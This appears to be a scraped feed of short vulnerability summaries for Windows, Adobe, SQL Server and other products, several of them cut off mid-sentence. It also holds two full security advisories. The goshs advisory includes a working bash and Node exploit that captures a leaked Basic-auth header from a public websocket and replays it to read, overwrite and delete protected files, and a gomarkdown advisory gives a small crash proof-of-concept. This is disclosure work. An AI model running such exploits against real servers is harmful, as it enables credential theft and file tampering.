Local privilege escalation in Windows Universal Plug and Play (UPnP) Device Host affects all supported Windows versions from Server 2012 through Windows 11 26H1 and Server 2025. Authenticated local attackers with low privileges can exploit an untrusted pointer dereference (CWE-822) to achieve complete system compromise with high impact to confidentiality, integrity, and availability. Microsoft has released patches for all affected versions. No public exploit identified at time of analysis, thoug
Local privilege escalation via use-after-free memory corruption in Windows Universal Plug and Play (UPnP) Device Host affects all supported Windows versions from Server 2012 through Windows 11 26H1. Authenticated local attackers with low privileges can exploit this CWE-416 flaw to gain SYSTEM-level access with low attack complexity (CVSS:3.1 AV:L/AC:L/PR:L). Vendor-released patches are available across all affected Windows 10, Windows 11, and Windows Server product lines. No public exploit code
Use-after-free in Microsoft Windows Speech component enables local privilege escalation to SYSTEM on Windows 10 (versions 1809, 21H2, 22H2) and Windows 11 (versions 22H3 through 26H1). Authenticated local attackers with low privileges can exploit memory corruption to gain full system control with low attack complexity and no user interaction required. CVSS 7.8 (High). Vendor-released patches available for all affected versions. No public exploit identified at time of analysis, though the straigh
Local privilege escalation in Windows Speech Brokered API allows authenticated users with low privileges to gain SYSTEM-level access via race condition exploitation. Affects all supported Windows 10, Windows 11, and Windows Server versions (2016-2025). Microsoft released patches in May 2025 across 17 product variants. Despite CVSS 7.8 severity, EPSS score is low (0.04%, 12th percentile) indicating minimal observed exploitation activity. No active exploitation confirmed (not in CISA KEV) and no public exploit code identified at time of analysis.
Local privilege escalation in Windows Speech Brokered API allows authenticated users to gain SYSTEM-level access via use-after-free memory corruption. All supported Windows 10, Windows 11, and Windows Server versions (2016-2025) are affected. Microsoft released patches in their April 2026 security update cycle. EPSS score of 0.04% (12th percentile) indicates low exploitation likelihood in the wild, and no active exploitation or public exploit code has been identified at time of analysis.
Privilege escalation in Windows Projected File System across Windows 10, 11, and Server versions allows authenticated local users to gain SYSTEM-level privileges by exploiting a race condition during concurrent file system operations. Affects all currently supported Windows versions from Server 2019 through Windows 11 26H1. Microsoft released patches in their latest security update cycle. No public exploit identified at time of analysis, though the low attack complexity (AC:L) and minimal privil
Windows Shell privilege escalation affects Windows 10 (1809+), Windows 11 (all versions through 26H1), and Windows Server 2019-2025 via a race condition vulnerability (CWE-362). Local authenticated attackers with low-privilege access can exploit concurrent execution flaws to gain SYSTEM-level privileges with low attack complexity and no user interaction required (CVSS 7.8). Vendor-released patches are available for all affected versions. No public exploit identified at time of analysis, though t
Local privilege escalation in Windows User Interface Core across Windows 10, 11, and Server 2016-2025 allows low-privileged authenticated users to gain elevated system access via a race condition vulnerability. Attack complexity is high (AC:H), requiring precise timing exploitation of shared resource synchronization flaws. Vendor-released patches are available for all affected versions. No public exploit identified at time of analysis, though the local attack vector and authenticated requirement
Privilege escalation in Windows User Interface Core across Windows 10 (1809-22H2), Windows 11 (22H3-26H1), and Windows Server (2019-2025) allows authenticated local attackers to gain elevated privileges via race condition exploitation. Vendor-released patches available for all affected versions. No public exploit identified at time of analysis. CVSS 7.8 (high) with local attack vector and high complexity (CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:C) indicates significant real-world risk in multi-user environments where low-privilege users can access affected systems.
Race condition in Windows User Interface Core (MSRC patch CVE-2026-27911) enables low-privileged authenticated attackers to elevate privileges to SYSTEM level on Windows 10, Windows 11, and Windows Server 2016-2025 systems. The flaw stems from improper synchronization when multiple threads concurrently access shared resources in the UI subsystem, creating a time-of-check-time-of-use (TOCTOU) window exploitable for privilege escalation. Patch available per vendor advisory. No public exploit ident
Local privilege escalation in Windows User Interface Core across Windows 10, 11, and Server 2019-2025 allows low-privileged authenticated attackers to achieve SYSTEM-level access via use-after-free memory corruption. The vulnerability requires high attack complexity and local access but enables container escape (scope change) with full confidentiality, integrity, and availability impact. Vendor-released patches are available for all affected versions. No public exploit identified at time of analysis, though the use-after-free primitive is a well-understood exploitation technique.
Arbitrary code execution in Adobe FrameMaker 2022.8 and earlier allows local attackers to execute malicious code with current user privileges by tricking victims into opening specially crafted files. This use-after-free memory corruption vulnerability requires no authentication but depends on user interaction. No confirmed active exploitation (not in CISA KEV) or public proof-of-concept identified at time of analysis, though the local attack vector and user interaction requirement reduce immediate remote threat surface compared to network-accessible vulnerabilities.
Arbitrary code execution in Adobe InDesign Desktop versions 20.5.2, 21.2 and earlier allows unauthenticated attackers to execute malicious code with current user privileges through maliciously crafted files. The use-after-free vulnerability requires user interaction (opening a weaponized InDesign file) but offers high impact across confidentiality, integrity, and availability. EPSS data not provided; no public exploit identified at time of analysis. Exploitation likelihood increased by low attack complexity (CVSS AC:L) requiring only basic social engineering to deliver malicious files.
Arbitrary code execution in Adobe FrameMaker 2022.8 and earlier allows local attackers to execute code with current user privileges via maliciously crafted files. The type confusion vulnerability (CWE-843) requires user interaction to open a weaponized document. CVSS 7.8 (High) reflects significant impact (full confidentiality, integrity, availability compromise) once exploitation succeeds. No public exploit identified at time of analysis, though the local attack vector and user interaction requirement reduce immediate remote exploitation risk.
Arbitrary code execution in Adobe FrameMaker 2022.8 and earlier allows local attackers to execute code in user context by delivering malicious FrameMaker documents that trigger integer underflow during file parsing. Attack requires social engineering to convince targets to open crafted files. No public exploit identified at time of analysis, though CVSS 7.8 severity reflects high impact across confidentiality, integrity, and availability if successfully exploited.
Arbitrary code execution in Adobe FrameMaker 2022.8 and earlier allows local attackers to execute malicious code with current user privileges through specially crafted files exploiting an integer underflow. Attack requires user interaction (opening a malicious file). CVSS 7.8 (High) reflects local attack vector with low complexity. No public exploit identified at time of analysis, and EPSS data not provided. Vendor advisory available at Adobe PSIRT (APSB26-36).
Out-of-bounds write in Adobe FrameMaker 2022.8 and earlier enables arbitrary code execution when users open specially crafted malicious files. The vulnerability achieves full confidentiality, integrity, and availability impact (CVSS 7.8 HIGH) but requires local access and user interaction, limiting immediate risk. No public exploit identified at time of analysis, and exploitation requires social engineering to deliver the malicious file to victims.
Out-of-bounds read in Adobe FrameMaker 2022.8 and earlier enables arbitrary code execution when users open malicious crafted files. Exploitation requires local access and user interaction (CVSS 7.8, AV:L/UI:R), allowing attackers to execute code with current user privileges and achieve high confidentiality, integrity, and availability impact. EPSS data not available; no confirmed active exploitation (CISA KEV) or public exploit code identified at time of analysis. Adobe has released security bulletin APSB26-36 addressing this vulnerability.
Heap-based buffer overflow in Adobe FrameMaker 2022.8 and earlier enables arbitrary code execution with high integrity and confidentiality impact when users open specially crafted malicious files. Attack requires local access and user interaction (CVSS 7.8, AV:L/UI:R), limiting remote exploitation scenarios. No public exploit identified at time of analysis. EPSS data not available, and vulnerability not listed in CISA KEV, suggesting exploitation remains theoretical despite the high CVSS score.
Arbitrary code execution in Adobe InCopy 20.5.2, 21.2 and earlier allows unauthenticated local attackers to execute malicious code with the victim's privileges through a specially crafted file. The vulnerability stems from an out-of-bounds write (CWE-787) triggering memory corruption. Exploitation requires the victim to open a malicious document, making this a viable social engineering vector. No public exploit identified at time of analysis, though the vulnerability's local attack vector and user interaction requirement moderately constrain immediate risk.
Heap-based buffer overflow in Adobe Bridge 16.0.2, 15.1.4, and earlier versions enables arbitrary code execution with victim's privileges when processing maliciously crafted files. Attack requires local access and user interaction (opening a weaponized file). CVSS 7.8 (High) reflects significant impact but local-only attack vector. No public exploit identified at time of analysis, and exploitation probability remains moderate given the user interaction requirement and local access constraint.
Arbitrary code execution in Adobe Illustrator 30.2, 29.8.5 and earlier versions allows unauthenticated local attackers to execute malicious code with current user privileges via crafted file exploitation. The vulnerability requires user interaction (opening a malicious file) but has low attack complexity once delivered. No public exploit identified at time of analysis, with EPSS data unavailable for risk quantification. The out-of-bounds write flaw affects memory management during file parsing operations.
Arbitrary code execution in Adobe Bridge 16.0.2, 15.1.4 and earlier allows local attackers to execute malicious code with current user privileges through specially crafted files. CVSS 7.8 (High) with EPSS data not available. No public exploit identified at time of analysis. Exploitation requires victim to open a malicious Bridge file, making this a realistic threat for targeted attacks using phishing or social engineering delivery methods.
Out-of-bounds read in Adobe Photoshop Desktop 27.4 and earlier enables arbitrary code execution when users open malicious files. Attackers can read beyond allocated memory boundaries during file parsing to execute code with current user privileges. CVSS 7.8 (High) reflects local attack vector requiring user interaction. No public exploit identified at time of analysis, though exploitation requires only low complexity once a victim opens the crafted file.
Heap-based buffer overflow in Adobe InDesign Desktop versions 20.5.2, 21.2 and earlier enables arbitrary code execution with high impact to confidentiality, integrity, and availability when users open malicious files. The vulnerability requires local access and user interaction (opening a crafted document), with no authentication barriers (CVSS PR:N). No public exploit identified at time of analysis, and CISA SSVC framework rates this as non-exploited with total technical impact but not automatable, indicating targeted attack potential rather than mass exploitation risk.
Heap-based buffer overflow in Adobe InDesign Desktop versions 20.5.2, 21.2 and earlier enables arbitrary code execution with high integrity and confidentiality impact when users open specially crafted malicious files. No public exploit identified at time of analysis. CVSS 7.8 reflects local attack vector requiring user interaction but no authentication, with complete system compromise potential in user context. EPSS risk data not available; exploitation requires social engineering to deliver malicious InDesign document.
Heap-based buffer overflow in Adobe InDesign Desktop versions 20.5.2, 21.2 and earlier enables arbitrary code execution with high confidentiality, integrity, and availability impact when users open malicious files. No public exploit identified at time of analysis. Attack requires local access and user interaction (opening a crafted file), with low attack complexity and no authentication requirements (CVSS:3.1 AV:L/AC:L/PR:N/UI:R). EPSS risk data not available; vulnerability enables complete system compromise in user context.
Out-of-bounds read in Adobe InDesign Desktop versions 20.5.2, 21.2, and earlier enables arbitrary code execution when users open malicious files. Attack requires local access and user interaction (CVSS AV:L/UI:R) but no authentication (PR:N), allowing attackers with file delivery capability to execute code as the victim user. No public exploit identified at time of analysis, though the vulnerability class (CWE-125 out-of-bounds read) is well-understood and commonly weaponized in document processors.
Heap-based buffer overflow in Adobe InDesign Desktop 20.5.2, 21.2 and earlier enables arbitrary code execution with high confidentiality, integrity, and availability impact. Attack requires local access and user interaction (victim opens malicious InDesign file), with low attack complexity and no authentication barriers. CVSS 7.8 reflects significant impact once social engineering succeeds. No CISA KEV listing indicates no confirmed active exploitation at time of analysis. Adobe has published security advisory APSB26-32 addressing this vulnerability.
Arbitrary code execution in Adobe InDesign Desktop versions through 21.2 allows unauthenticated attackers to execute malicious code with full user privileges by exploiting an out-of-bounds write vulnerability via a specially crafted InDesign file. Attack requires local access and user interaction to open the malicious document. No public exploit identified at time of analysis, though CVSS 7.8 reflects high impact if successfully exploited. Adobe has released security bulletin APSB26-32 addressing this memory corruption flaw.
Use-after-free in libsixel's gdk-pixbuf2 loader enables local attackers to achieve code execution via crafted images. Affects libsixel versions through 1.8.7 when compiled with --with-gdk-pixbuf2 option. The vulnerability stems from inconsistent memory management in load_with_gdkpixbuf(), which manually frees reference-counted frame objects, leaving dangling pointers that callbacks can access post-cleanup. CVSS 7.8 (High) with local attack vector requiring user interaction. Fixed in version 1.8.7-r1. No confirmed active exploitation (CISA KEV), though proof-of-concept feasibility is high given the deterministic nature of the memory corruption.
Out-of-bounds read in Adobe InCopy 20.5.2, 21.2 and earlier allows arbitrary code execution when users open malicious files. CVSS 7.8 (High) reflects local attack vector requiring user interaction to open a weaponized document, which then triggers memory disclosure leading to code execution in user context. No public exploit identified at time of analysis. EPSS data not available, but the local-only attack vector and mandatory user interaction substantially reduce real-world risk compared to remotely exploitable flaws.
Command injection in Composer's Perforce integration allows arbitrary code execution when processing malicious composer.json files. Attackers controlling VCS repository configuration can inject shell commands via unsanitized Perforce connection parameters (port, user, client), which execute even without Perforce installed. CVSS 7.8 (High) with local attack vector requiring user interaction. Affects Composer versions before 2.2.27 and 2.9.6. Exploitation requires victim to run Composer commands on attacker-controlled project root composer.json, limiting scope to supply chain or social engineering scenarios. No KEV listing or public POC identified at time of analysis, but exploitation barrier is low once malicious config is introduced.
Heap-based buffer overflow in Adobe Bridge 16.0.2, 15.1.4, and earlier allows arbitrary code execution with user privileges when processing malicious files. CVSS 7.8 (High) reflects the local attack vector requiring victim interaction to open a crafted file. No public exploit identified at time of analysis, with SSVC framework rating this as non-automatable but capable of total technical impact. Exploitation requires social engineering to deliver the malicious file to the target user.
Heap-based buffer overflow in Adobe Bridge 16.0.2, 15.1.4, and earlier versions enables arbitrary code execution with user privileges when processing maliciously crafted files. CVSS 7.8 reflects high impact across confidentiality, integrity, and availability, requiring local access and user interaction. CISA SSVC framework categorizes this as non-automatable with total technical impact. No public exploit identified at time of analysis, and vendor has released security advisory APSB26-39 addressing the vulnerability.
Arbitrary code execution via heap-based buffer overflow in Adobe Bridge (versions 16.0.2, 15.1.4 and earlier) allows local attackers to execute code in the user's security context by tricking victims into opening specially crafted malicious files. No public exploit identified at time of analysis, with SSVC assessment indicating no current exploitation, non-automatable attack requiring user interaction, and total technical impact upon successful compromise.
SQL injection in Microsoft SQL Server 2016-2025 allows authenticated high-privilege attackers to elevate privileges locally via improper neutralization of SQL command elements. Affected versions include SQL Server 2016 SP3, 2017, 2019, 2022, and 2025 across multiple cumulative updates and GDR releases. The CVSS 6.7 score reflects the requirement for high-privilege authentication and local attack vector, but the high confidentiality, integrity, and availability impact makes this a material risk f
### Summary goshs leaks file-based ACL credentials through its public collaborator feed when the server is deployed without global basic auth. Requests to `.goshs`-protected folders are logged before authorization is enforced, and the collaborator websocket broadcasts raw request headers, including `Authorization`. An unauthenticated observer can capture a victim's folder-specific basic-auth header and replay it to read, upload, overwrite, and delete files inside the protected subtree. I reproduced this on `v2.0.0-beta.5`, the latest supported release as of April 10, 2026. ### Details The main web UI and collaborator websocket stay public when goshs is started without global `-b user:pass` authentication: - `httpserver/server.go:72-85` only installs `BasicAuthMiddleware()` when a global username or password is configured The vulnerable request is logged before `.goshs` authorization is enforced: - `httpserver/handler.go:277-279` calls `emitCollabEvent()` and `logger.LogRequest()` before the protected file is passed into ACL enforcement - `httpserver/handler.go:291-309` performs folder-level `.goshs` authentication later in `applyCustomAuth()` The collaborator pipeline copies and broadcasts every request header: - `httpserver/collaborator.go:22-46` flattens all request headers, including `Authorization`, into the websocket event and sends them to the hub - `ws/hub.go:77-84` fans the event out live to all connected websocket clients - `ws/hub.go:116-122` replays up to 200 prior HTTP events to newly connected websocket clients via catchup The frontend also makes the leak easier to understand by decoding authorization values: - `assets/js/main.js:627-645` formats and decodes the `Authorization` header for display in the collaborator panel In practice, a victim request such as: ```http GET /ACLAuth/secret.txt Authorization: Basic YWRtaW46YWRtaW4= ``` is visible to any public websocket observer before the protected file's ACL check is enforced. The attacker can then replay the leaked header against the same protected folder and gain the victim's effective access. ### PoC Manual verification commands used: `Terminal 1` ```bash cd '/Users/r1zzg0d/Documents/CVE hunting/targets/goshs_beta5' go build -o /tmp/goshs_beta5 ./ rm -rf /tmp/goshs_collab_root mkdir -p /tmp/goshs_collab_root/ACLAuth cp integration/keepFiles/goshsACLAuth /tmp/goshs_collab_root/ACLAuth/.goshs printf 'very secret\n' > /tmp/goshs_collab_root/ACLAuth/secret.txt /tmp/goshs_beta5 -d /tmp/goshs_collab_root -p 18096 ``` `Terminal 2` ```bash node - <<'NODE' const ws = new WebSocket('ws://127.0.0.1:18096/?ws'); ws.onmessage = (ev) => console.log(ev.data.toString()); NODE ``` `Terminal 3` ```bash curl -s -o /dev/null -w '%{http_code}\n' http://127.0.0.1:18096/ACLAuth/secret.txt curl -s -u admin:admin http://127.0.0.1:18096/ACLAuth/secret.txt curl -s -H 'Authorization: Basic YWRtaW46YWRtaW4=' http://127.0.0.1:18096/ACLAuth/secret.txt curl -s -o /dev/null -w '%{http_code}\n' -H 'Authorization: Basic YWRtaW46YWRtaW4=' -X PUT --data-binary 'owned' http://127.0.0.1:18096/ACLAuth/pwn.txt curl -s -o /dev/null -w '%{http_code}\n' -H 'Authorization: Basic YWRtaW46YWRtaW4=' 'http://127.0.0.1:18096/ACLAuth/secret.txt?delete' ``` Two terminal commands I ran during local validation: ```bash curl -s -o /dev/null -w '%{http_code}\n' http://127.0.0.1:18096/ACLAuth/secret.txt curl -s -H 'Authorization: Basic YWRtaW46YWRtaW4=' http://127.0.0.1:18096/ACLAuth/secret.txt ``` Observed results from manual verification: - the anonymous request returned `401` - the victim request returned `very secret` - the replayed leaked header also returned `very secret` - the replayed `PUT` returned `200` - the replayed `?delete` returned `200` - the public websocket showed `Authorization":"Basic YWRtaW46YWRtaW4="` PoC Video 1: https://github.com/user-attachments/assets/1347838e-28a0-4c9f-be9f-db7e2938c752 Single-script verification: ```bash '/Users/r1zzg0d/Documents/CVE hunting/output/poc/gosh_poc4' ``` Observed script result: - `Captured header: Basic YWRtaW46YWRtaW4=` - `Anonymous GET status: 401` - `Replayed-header GET body: very secret` - `Replayed-header PUT status: 200` - `Replayed-header delete status: 200` - `[RESULT] VULNERABLE: public collaborator feed leaked ACL credentials that unlocked the protected subtree` PoC Video 2: https://github.com/user-attachments/assets/b25648a9-b96c-46b3-9ee4-0ae4cc1c3472 `gosh_poc4` script content: ```bash #!/usr/bin/env bash set -euo pipefail REPO='/Users/r1zzg0d/Documents/CVE hunting/targets/goshs_beta5' FIXTURE='/Users/r1zzg0d/Documents/CVE hunting/targets/goshs_beta5/integration/keepFiles/goshsACLAuth' BIN='/tmp/goshs_beta5_collab_leak' PORT='18096' WORKDIR="$(mktemp -d /tmp/goshs-collab-beta5-XXXXXX)" ROOT="$WORKDIR/root" WS_LOG="$WORKDIR/ws.log" GOSHS_PID="" WATCH_PID="" cleanup() { if [[ -n "${WATCH_PID:-}" ]]; then kill "${WATCH_PID}" >/dev/null 2>&1 || true wait "${WATCH_PID}" 2>/dev/null || true fi if [[ -n "${GOSHS_PID:-}" ]]; then kill "${GOSHS_PID}" >/dev/null 2>&1 || true wait "${GOSHS_PID}" 2>/dev/null || true fi } trap cleanup EXIT mkdir -p "${ROOT}/ACLAuth" cp "${FIXTURE}" "${ROOT}/ACLAuth/.goshs" printf 'very secret\n' > "${ROOT}/ACLAuth/secret.txt" echo "[1/6] Building goshs beta.5" (cd "${REPO}" && go build -o "${BIN}" ./) echo "[2/6] Starting goshs without global auth on 127.0.0.1:${PORT}" "${BIN}" -d "${ROOT}" -p "${PORT}" >"${WORKDIR}/goshs.log" 2>&1 & GOSHS_PID=$! for _ in $(seq 1 40); do if curl -s "http://127.0.0.1:${PORT}/" >/dev/null 2>&1; then break fi sleep 0.25 done echo "[3/6] Opening an unauthenticated websocket observer" node - <<'NODE' >"${WS_LOG}" & const ws = new WebSocket('ws://127.0.0.1:18096/?ws'); ws.onopen = () => console.log('OPEN'); ws.onmessage = (ev) => { const msg = ev.data.toString(); console.log(msg); if (msg.includes('Authorization')) process.exit(0); }; setTimeout(() => process.exit(0), 10000); NODE WATCH_PID=$! echo "[4/6] Simulating a victim request with folder credentials" curl -s -u admin:admin "http://127.0.0.1:${PORT}/ACLAuth/secret.txt" >/dev/null wait "${WATCH_PID}" || true WATCH_PID="" LEAKED_HEADER="$(python3 - "${WS_LOG}" <<'PY' import pathlib import re import sys text = pathlib.Path(sys.argv[1]).read_text() m = re.search(r'Basic [A-Za-z0-9+/=]+', text) print(m.group(0) if m else '') PY )" if [[ -z "${LEAKED_HEADER}" ]]; then echo "[ERROR] No leaked Authorization header was captured." >&2 echo "[DEBUG] Websocket output:" >&2 cat "${WS_LOG}" >&2 exit 1 fi echo "[5/6] Replaying the leaked header as the attacker" UNAUTH_CODE="$(curl -s -o /dev/null -w '%{http_code}' "http://127.0.0.1:${PORT}/ACLAuth/secret.txt")" READ_BACK="$(curl -s -H "Authorization: ${LEAKED_HEADER}" "http://127.0.0.1:${PORT}/ACLAuth/secret.txt")" PUT_CODE="$(curl -s -o /dev/null -w '%{http_code}' -H "Authorization: ${LEAKED_HEADER}" -X PUT --data-binary 'owned' "http://127.0.0.1:${PORT}/ACLAuth/pwn.txt")" DELETE_CODE="$(curl -s -o /dev/null -w '%{http_code}' -H "Authorization: ${LEAKED_HEADER}" "http://127.0.0.1:${PORT}/ACLAuth/secret.txt?delete")" if [[ "${UNAUTH_CODE}" != "401" ]]; then echo "[ERROR] Expected anonymous direct access to fail with 401, got ${UNAUTH_CODE}." >&2 exit 1 fi if [[ "${READ_BACK}" != "very secret" ]]; then echo "[ERROR] Replayed header did not unlock the protected file." >&2 exit 1 fi if [[ "${PUT_CODE}" != "200" ]]; then echo "[ERROR] Expected replayed-header PUT to return 200, got ${PUT_CODE}." >&2 exit 1 fi if [[ "${DELETE_CODE}" != "200" ]]; then echo "[ERROR] Expected replayed-header delete to return 200, got ${DELETE_CODE}." >&2 exit 1 fi if [[ ! -f "${ROOT}/ACLAuth/pwn.txt" ]]; then echo "[ERROR] PUT did not create pwn.txt." >&2 exit 1 fi if [[ -f "${ROOT}/ACLAuth/secret.txt" ]]; then echo "[ERROR] Delete did not remove secret.txt." >&2 exit 1 fi echo "[6/6] Results" echo "Captured header: ${LEAKED_HEADER}" echo "Anonymous GET status: ${UNAUTH_CODE}" echo "Replayed-header GET body: ${READ_BACK}" echo "Replayed-header PUT status: ${PUT_CODE}" echo "Replayed-header delete status: ${DELETE_CODE}" echo "[RESULT] VULNERABLE: public collaborator feed leaked ACL credentials that unlocked the protected subtree" ``` ### Impact This issue is a sensitive information disclosure that becomes an authentication bypass against `.goshs`-protected content. Any unauthenticated observer who can access the public collaborator websocket can steal folder-level basic-auth credentials from a victim request and immediately reuse them to read, upload, overwrite, or delete files inside the protected subtree. Deployments that rely on public goshs access with selective `.goshs`-protected subfolders are directly exposed. ### Remediation Suggested fixes: 1. Never store or broadcast sensitive headers such as `Authorization`, `Cookie`, or `Proxy-Authorization` in collaborator events. 2. Move collaborator logging until after access-control checks, and log only minimal metadata instead of raw headers and bodies. 3. Protect the collaborator websocket and panel with the same or stronger authentication boundary as the resources being observed.
BitLocker encryption bypass in Windows Server 2012 through 2022 enables local attackers with physical access to circumvent disk encryption protections without authentication. The vulnerability affects all Server Core and standard editions across ten years of Windows Server releases. Patch available per Microsoft Security Response Center (MSRC-2026-27913). No public exploit identified at time of analysis, but the local attack vector (AV:L) with no authentication requirement (PR:N) indicates high risk in scenarios where physical device access is possible, such as lost/stolen servers or insider threats.
Path traversal in Adobe ColdFusion 2023.18, 2025.6 and earlier allows authenticated remote attackers to bypass security controls and cause high availability impact through unauthorized file system access. CVSS 7.7 (High) reflects network-accessible attack vector with low complexity requiring only low-privilege authentication and scope change indicating impact beyond vulnerable component. No active exploitation (CISA KEV) or public POC identified at time of analysis, but zero-interaction exploitation pathway and vendor security advisory publication (APSB26-38) indicate concrete threat requiring prompt remediation.
SQL injection in Microsoft SQL Server 2016-2025 allows authenticated high-privilege attackers to elevate privileges locally through improper neutralization of special elements in SQL commands. Affected versions span SQL Server 2016 SP3 through 2025, with patch available from Microsoft. Attack requires local access and high-privilege credentials (PR:H in CVSS vector), limiting real-world impact to insider threats or compromised administrative accounts; CVSS 6.7 reflects high confidentiality, integrity, and availability impact but constrained by authentication and local-only attack vector.
OpenStack Keystone's LDAP identity backend grants authentication access to disabled user accounts due to improper string-to-boolean conversion logic. Versions 8.0.0 through 28.0.0 fail to convert LDAP-disabled status into boolean values when user_enabled_invert is False (default), causing disabled accounts to authenticate as enabled. This affects all LDAP-backed Keystone deployments without specific configuration overrides. CVSS 7.7 with changed scope (S:C) indicates potential cross-tenant privilege issues. EPSS data not available; no public exploit identified at time of analysis, though the logic flaw is straightforward to trigger with valid low-privilege credentials.
Security feature bypass in Adobe ColdFusion 2023.18, 2025.6, and earlier allows remote unauthenticated attackers to circumvent security controls via improper input validation, potentially enabling unauthorized access to protected resources. The vulnerability carries a CVSS score of 7.5 with high integrity impact, though exploitation reportedly requires user interaction per the description. No public exploit code or active exploitation confirmed at time of analysis, but the authentication bypass classification indicates potential for privilege escalation or access control circumvention.
Windows Server Update Service (WSUS) fails to properly validate network inputs, allowing unauthenticated remote attackers to cause denial of service across all Windows Server versions from 2012 through 2025. The vulnerability (CVSS 7.5) enables network-based tampering with high availability impact (AV:N/AC:L/PR:N/UI:N/A:H), though confidentiality and integrity remain unaffected. Patch available per vendor advisory; no public exploit identified at time of analysis. The Authentication Bypass tag and PR:N vector confirm attackers require no credentials, making internet-exposed WSUS servers particularly vulnerable.
Remote denial-of-service in Windows Local Security Authority Subsystem Service (LSASS) allows unauthenticated network attackers to crash Windows systems through null pointer dereference exploitation. Affects Windows 10 (versions 1607-22H2), Windows 11 (22H3-26H1), and Windows Server (2016-2025) across multiple release channels. Microsoft has released patches for all affected versions. No public exploit identified at time of analysis, but the low attack complexity (AC:L) and unauthenticated netwo
Unauthenticated access to free5GC UDR subscriber identifiers exposes SUPI/IMSI values via unprotected 5G Service Based Interface endpoint. Missing return statements in free5GC UDR versions prior to 4.2.1 allow attackers to retrieve complete subscriber databases with a single parameterless HTTP GET request, undermining 3GPP SUCI privacy mechanisms. Public exploit code exists. EPSS score is low (0.10%) indicating limited observed exploitation, but impact is severe for exposed deployments with misconfigured network segmentation.
Denial of service in Windows HTTP.sys kernel-mode driver allows unauthenticated remote attackers to crash affected systems via malformed HTTP requests. Affects all currently supported Windows 11 versions (22H2 through 26H1) and Windows Server 2022/2025 editions. The vulnerability stems from an out-of-bounds read (CWE-125) triggered when HTTP.sys processes specially crafted network packets without authentication (CVSS AV:N/PR:N). Vendor-released patches available for all affected versions with specific build numbers identified. No public exploit identified at time of analysis, though low attack complexity (AC:L) suggests straightforward exploitation once technical details emerge.
SQL injection in JetEngine WordPress plugin (≤3.8.6.1) via Custom Content Type REST API allows unauthenticated remote attackers to extract sensitive database information. The vulnerability stems from unsanitized search parameters in REST endpoints, bypassing WordPress's built-in SQL protections. Attack complexity is low (CVSS AC:L) with no user interaction required. EPSS and KEV data not provided; exploitation requires Custom Content Types module enabled with public REST endpoints configured.
Authentication bypass in Fortinet FortiSOAR allows unauthenticated remote attackers to circumvent two-factor authentication (2FA) protections via replay attacks against intercepted authentication tokens. Affects both PaaS and on-premise deployments of FortiSOAR versions 7.5.0-7.5.2 and 7.6.0-7.6.3. Successful exploitation requires network positioning to intercept and decrypt authentication traffic, then replay captured 2FA requests before token expiration (CVSS:3.1/AV:N/AC:H/PR:N/UI:R). EPSS data not available; no public exploit code or CISA KEV listing identified at time of analysis, though the precise attack requirements (traffic interception, decryption, timing) increase complexity beyond simple network access.
### Summary Processing a malformed input containing a `<` character that is not followed by a `>` character anywhere in the remaining text with a SmartypantsRenderer will lead to Out of Bounds read or a panic. ### Details The `smartLeftAngle()` function in `html/smartypants.go:367-376` performs an out-of-bounds slice operation when processing a `<` character that is not followed by a `>` character anywhere in the remaining text. https://github.com/gomarkdown/markdown/blob/37c66b85d6ab025ba67a73ba03b7f3ef55859cca/html/smartypants.go#L367-L376 If the length of the slice is lower than its capacity, this leads to an extra byte of data read. If the length equals the capacity, this leads to a panic. ### PoC ```golang package main import ( "bytes" "fmt" "github.com/gomarkdown/markdown/html" ) func main() { src := []byte("<a") fmt.Printf("Input: %q (len=%d, cap=%d)\n", src, len(src), cap(src)) var buf bytes.Buffer sp := html.NewSmartypantsRenderer(html.Smartypants) sp.Process(&buf, src) // panics: slice bounds out of range fmt.Printf("Output: %q\n", buf.String()) } ``` ### Impact This vulnerability will lead to a Denial of Service / panic on the processing service. -- The Datadog Security Team